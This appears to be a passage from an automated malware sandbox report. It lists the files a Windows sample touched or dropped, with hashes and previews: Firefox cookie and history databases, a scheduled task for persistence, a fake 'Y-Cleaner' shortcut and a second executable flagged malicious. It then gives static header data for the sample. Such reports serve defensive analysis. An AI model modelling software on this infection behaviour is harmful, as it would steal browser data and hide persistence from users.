SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-shm

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.035699946889726504
Encrypted:	false
SSDEEP:	3:GtlstFpeFL8DVWlstFpeFL8DVRJ89//alEl:GtWtKFIDVWWtKFIDVRJ89XuM
MD5:	B373B05D6C92BFFF7A2CE53D87D51D73
SHA1:	306529B810743ACDE4C9B0C9E656C87A4964CAA4
SHA-256:	2A6A208D83757FF719024B2C93D92C610875B8289A4FE06A30C03C961CD039E4
SHA-512:	9B28A74D5B5E3F8EDA52BF1F67686F4201590ECCD10B9DC8CD0B595CF061918F0CFCFDFA08735FDFA0EF6D331DDA501AD04AA60951EDFD74C2A0B477D8D8535F
Malicious:	true
Preview:	..-......................{ .-o..5.$&.3..w'..#.E..-......................{ .-o..5.$&.3..w'..#.E........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	32824
Entropy (8bit):	0.03971446214882193
Encrypted:	false
SSDEEP:	3:Ol1fwAe8qfQitXfjl/ll8rEXsxdwhml8XW3R2:KN+tX7tll8dMhm93w
MD5:	5B27A47CC7956DDA6286CAE50467D3EC
SHA1:	30D260438648FE821C268CEC2B1B419795DAC222
SHA-256:	47CFD67193375FB4A3CCAACC5DD2BDD4492D3A009E4C31A10B29E59AAF523412
SHA-512:	53FB58491CE3D31C93642D2F1451506E2F1AFF656BDADF47D21AB0F78BFA5C38A0B3C4F7BF685244C91FE5081D09B16161CD9684A425ABE94E843FA896CE5AEB
Malicious:	true
Preview:	7....-..........5.$&.3.....H.\..........5.$&.3... {..o-................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs-1.js

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	modified
Size (bytes):	10085
Entropy (8bit):	5.535144679252825
Encrypted:	false
SSDEEP:	192:WnaRtZYbBp6Khj4qyaaX86KakfGNBw8dYSl:xekquOcwL0
MD5:	78D5742FE4D2FD313F2925A6C6044356
SHA1:	762C8D4CA21558F8F6B6E1CD630A5306F3ED5ECF
SHA-256:	08A5B516BC25CDC290AB375ED17D5C0A5F3BDF9A8B9332CFEF30CAF2E0ECCEB2
SHA-512:	537BC17355CFCB06E0A1AC7AF35EA052CBB800F49295CDE75EDF966225067DE17198CF0B588D56C4809066B3ADC8A6C63CB8E5205AB4B93A29FF70B32A5DBB2C
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 1);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.up

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	10085
Entropy (8bit):	5.535144679252825
Encrypted:	false
SSDEEP:	192:WnaRtZYbBp6Khj4qyaaX86KakfGNBw8dYSl:xekquOcwL0
MD5:	78D5742FE4D2FD313F2925A6C6044356
SHA1:	762C8D4CA21558F8F6B6E1CD630A5306F3ED5ECF
SHA-256:	08A5B516BC25CDC290AB375ED17D5C0A5F3BDF9A8B9332CFEF30CAF2E0ECCEB2
SHA-512:	537BC17355CFCB06E0A1AC7AF35EA052CBB800F49295CDE75EDF966225067DE17198CF0B588D56C4809066B3ADC8A6C63CB8E5205AB4B93A29FF70B32A5DBB2C
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 1);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.up

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	90
Entropy (8bit):	4.194538242412464
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
MD5:	C4AB2EE59CA41B6D6A6EA911F35BDC00
SHA1:	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
SHA-256:	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
SHA-512:	71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
Malicious:	false
Preview:	{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	90
Entropy (8bit):	4.194538242412464
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
MD5:	C4AB2EE59CA41B6D6A6EA911F35BDC00
SHA1:	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
SHA-256:	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
SHA-512:	71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
Malicious:	false
Preview:	{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	SQLite 3.x database, user version 131075, last written using SQLite version 3042000, page size 512, file counter 6, database pages 8, cookie 0x4, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	2.0836444556178684
Encrypted:	false
SSDEEP:	24:JBwdh/cEUcR9PzNFPFHx/GJRBdkOrDcRB1trwDeAq2gRMyxr3:jnEUo9LXtR+JdkOnohYsl
MD5:	8B40B1534FF0F4B533AF767EB5639A05
SHA1:	63EDB539EA39AD09D701A36B535C4C087AE08CC9
SHA-256:	AF275A19A5C2C682139266065D90C237282274D11C5619A121B7BDBDB252861B
SHA-512:	54AF707698CED33C206B1B193DA414D630901762E88E37E99885A50D4D5F8DDC28367C9B401DFE251CF0552B4FA446EE28F78A97C9096AFB0F2898BFBB673B53
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\MyData\DataLogs.conf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.75
Encrypted:	false
SSDEEP:	3:Rt:v
MD5:	CF759E4C5F14FE3EEC41B87ED756CEA8
SHA1:	C27C796BB3C2FAC929359563676F4BA1FFADA1F5
SHA-256:	C9F9F193409217F73CC976AD078C6F8BF65D3AABCF5FAD3E5A47536D47AA6761
SHA-512:	C7F832AEE13A5EB36D145F35D4464374A9E12FA2017F3C2257442D67483B35A55ECCAE7F7729243350125B37033E075EFBC2303839FD86B81B9B4DCA3626953B
Malicious:	false
Preview:	.5.False

C:\Users\user\Desktop\Cleaner.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Mon Dec 9 22:45:06 2024, mtime=Mon Dec 9 22:45:06 2024, atime=Mon Dec 9 22:45:06 2024, length=1502720, window=hide
Category:	dropped
Size (bytes):	2212
Entropy (8bit):	3.916646215079717
Encrypted:	false
SSDEEP:	24:8PbZzzHY0gadRmqlgKikrnQgF2FcAofEWvNfMgz9MgKO4ZECqMgr2vqyFm:8PbZzrYGRBrnn2ZcnvNfF9EZbqjyF
MD5:	85B6FBF9F41634F2E8946690C555E6BE
SHA1:	D58C04596A8E85220286D0303FB4E6B4836799DD
SHA-256:	4AAA40105A9342C3D2257360CE663A121072F7A178EDC856380E30A05A10D8F5
SHA-512:	BBEBA2191373015564D04E36517AAB2076A02AD04113D9EA398CEAE1E421875B22350C11B6A9E0CD651714CA7AA3835F3D6F22690E6EBF1FC173CB1701195F04
Malicious:	false
Preview:	L..................F.@.. ...z.O`.J..z.O`.J..z.O`.J..........................@.:..DG..Yr?.D..U..k0.&...&......vk.v.....?..J....X`.J......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y<............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b.....................=...L.o.c.a.l.....N.1......Y....Temp..:......CW.^.Y......l......................C..T.e.m.p.....\|.1......Y....FC9WFW~1..d......Y...Y.............................,.f.C.9.w.F.W.8.u.5.F.G.5.1.2.N.R.e.D.w.N.w.E.K.4.w.....h.2......Y.. .Y-CLEA~1.EXE..L......Y...Y.............................e..Y.-.C.l.e.a.n.e.r...e.x.e.......x...............-.......w........... .a......C:\Users\user\AppData\Local\Temp\fC9wFW8u5FG512NReDwNwEK4w\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.=.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.f.C.9.w.F.W.8.u.5.F.G.5.1.2.N.R.e.D.w.N.w.E.K.4.w.\.Y.-.C.l.e.a.n.e.r...e.x.e.I.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.

C:\Users\user\Documents\CAFIJKFHIJ.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3196416
Entropy (8bit):	6.661446371150704
Encrypted:	false
SSDEEP:	49152:2IX4k+/kZFoejWG7pFo4jjBuqNFrzrLujVUeTWDqHFC:2l1oFojG7pFo4jtuokSeqD
MD5:	520EE940832D8A70CEF812A75401009C
SHA1:	83D76E5B100E044BE166E1BE2B30BF5F1EAF2332
SHA-256:	536DF3A39899DEC8C749EF790BC7D55C8DC60052555C74FA2ED1F8518A2180EB
SHA-512:	5B6E1E9495849C12E6E268C17347E4B3CE15C9B684E0697C524E5DBB7D8D0F9C5E14BDC2945E1C90949272893B911CEF913BECAD4855FB58516784FD5B0D7217
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................0...........@...........................1......1...@.................................W...k...........................(.0..............................0..................................................... . ............................@....rsrc...............................@....idata ............................@...ybwlghty..........................@...bbydquix......0.......0.............@....taggant.0....0.."....0.............@...........................................................................................................................................................................................................................................................

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\Documents\CAFIJKFHIJ.exe
File Type:	data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	3.44178615772674
Encrypted:	false
SSDEEP:	6:ouTZbXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0lHXEt0:o4f2RKQ1CGAFAjzvYRQVHXEt0
MD5:	28189A6C06BBEF31812D9C52254B277F
SHA1:	F6EE6A67BE0D79AB7CA8F33DC50C177AE15E7D25
SHA-256:	B432EC64FD8E1F90AE015276E7276757EB45708DFB66127D109FFEA845B88BEF
SHA-512:	721372AD323B126A0979243922F0E5FF216A701BABA1DD9714E2A978DEAED22FB16CD75CC2219EB4FFA77FBFC757AFB0D02CDB71F7CB73948D80C4A98835B6B4
Malicious:	false
Preview:	....B.g}..HM...u....F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................+.@3P.........................

Chrome Cache Entry: 103

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (764)
Category:	dropped
Size (bytes):	769
Entropy (8bit):	5.136796556751409
Encrypted:	false
SSDEEP:	24:bPgTJvnbEgBHslgT9lCuABuoB7HHHHHHHYqmffffffo:MThEgKlgZ01BuSEqmffffffo
MD5:	511E521FF04361FC89E94E1BE0B37931
SHA1:	7E0392278340478880BBE496E2F03B6C5D5338E7
SHA-256:	3298DEFA5A0B66CF2CDEA3C235167C13E0FBBBB144D95104AA4F9A751B6CF588
SHA-512:	C3DEB859CE94F7970E4FC725A3AC25492CFF084ED494881252F79821AB87E23E02981761483DE9B7F013D5B080D0EE5AC790AF938A317042923635DA4B7B708A
Malicious:	false
Preview:	)]}'.["",["xrp cryptocurrency","mt kanlaon volcano eruption","path of exile 2 skill nerfs","nyt connections hints december 9","lehigh penn state wrestling results","solar flares","colorado snow forecast","tiktok banned"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

Chrome Cache Entry: 104

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 105

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	dropped
Size (bytes):	132984
Entropy (8bit):	5.435750779457879
Encrypted:	false
SSDEEP:	3072:fVkX33ov7GsG688fJbk/5xnsZLWjwR2i6o:f+3lr6t2/5xnsZawR8o
MD5:	2DA26CA71B96ADC2EF010E5A3931157C
SHA1:	B080390D6BAE46C56CEDD50B78DEB53ECEBDA03B
SHA-256:	3B8039606FBF56A4082304B611F985EF8C5D1BBBA4B1A65AC0926713F672E38B
SHA-512:	FF83D7418C0ACF2E1F39E21BDCCF63ACBD90C465983B559E4CCE01BB40B42A983746B5985A492BE0E5A32AFAD94F5B3474C6BB2D808E43D0F71280C35DF559FC
Malicious:	false
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 106

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	dropped
Size (bytes):	5162
Entropy (8bit):	5.3503139230837595
Encrypted:	false
SSDEEP:	96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
MD5:	7977D5A9F0D7D67DE08DECF635B4B519
SHA1:	4A66E5FC1143241897F407CEB5C08C36767726C1
SHA-256:	FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
SHA-512:	8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
Malicious:	false
Preview:	.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 107

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2412)
Category:	dropped
Size (bytes):	174954
Entropy (8bit):	5.550148947243928
Encrypted:	false
SSDEEP:	3072:eEBR1XAUw+9+in7oNRFhJpGha9VMRWInJ+LBIwK555ypuq/dP/JlpNMWzeAxaPIa:eKR1tw+9+i7GFhJcha/MRWIJ+LBIwK5n
MD5:	8DF81901713526C08F170352ACB79008
SHA1:	E1E30358A27E0A475AD0576FC9AE389FD95B49BB
SHA-256:	681F8E5F962B4D48083A1313B3B7978E6906B9C526AA488A4B42EA1EA97B8358
SHA-512:	E82BB4618D69A9F95EF7CDBAA380C34563725803F326F572FCE88E30F51577E75B1D701D86EE63E273A7D65A8ACDDA601FBB83EE079080634CBBE2B3B583A14A
Malicious:	false
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.Yi=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Zi=class extends _.Q{constructor(){super()}};.}catch(e){_._DumpException(e)}.try{.var $i,aj,ej,hj,gj,cj,fj;$i=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};aj=function(){_.Na()};ej=function(a,b){(_.bj\|\|(_.bj=new cj)).set(a,b);(_.dj\|\|(_.dj=new cj)).set(b,a)};hj=function(a){if(fj===void 0){const b=new gj([],{});fj=Array.prototype.concat.call([],b).length===1}fj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ij=function(a,b,c){a=_.tb(a,b,c);return Array.isArray(a)?a:_.Fc};._.jj=function(a,b){a=(2&b?a\|2:a&-3)\|32;return a&=-2049};_.kj=function(a,b){a===0&&(a=_.jj(a,b));return a\|1};_.lj=function(a){return!!(2&a)&&!!(4&a)\|\|!!(2048&a)};_.mj=function(a,b,c){32&b&&c\|\|(a&=-33);return a};._.pj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ij(a,b,d);var k=h[_

Chrome Cache Entry: 108

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.944002628638543
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'806'848 bytes
MD5:	c5cc3918ae519563751641959f52ea48
SHA1:	a89fbdcbe3042189962c1c68853f34cd9c9a5c6b
SHA256:	3b83ba98959f8b8c013d6b6fe94b17c5de99b1a798da2f5b33a2c3be6e9b18b6
SHA512:	7a3752aead41b8f970de5dad7bd81e16c8728984deadaf4f9fa8d66b191d55c4a0a843ddb05d95710e7a3cdcc27ab5262cae7889b6e4faf5054e655abad6afe7
SSDEEP:	24576:T3Dps2BoznfLfugorpbYiME9wwesoqmziZCkiMwNVl5PC5J1GYrqH8rnS6fyAuhK:zpAnTuV15n7skPwvoJIYr+QnSDA39v
TLSH:	ED853354A511ED17F8D1A9317B4B42A2EAEC172D63318A7C0B41DB5C33AB6BADF0680C
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d...d...d.....s.\|.....F.i.....r.^...m.[.g...m.K.b.......g...d.........w.w.....E.e...Richd...........PE..L....dTg...........

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0xa95000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67546419 [Sat Dec 7 15:04:57 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F8C98D5513Ah
pshufw mm3, qword ptr [ebx], 00h
add byte ptr [eax], al
add byte ptr [eax], al
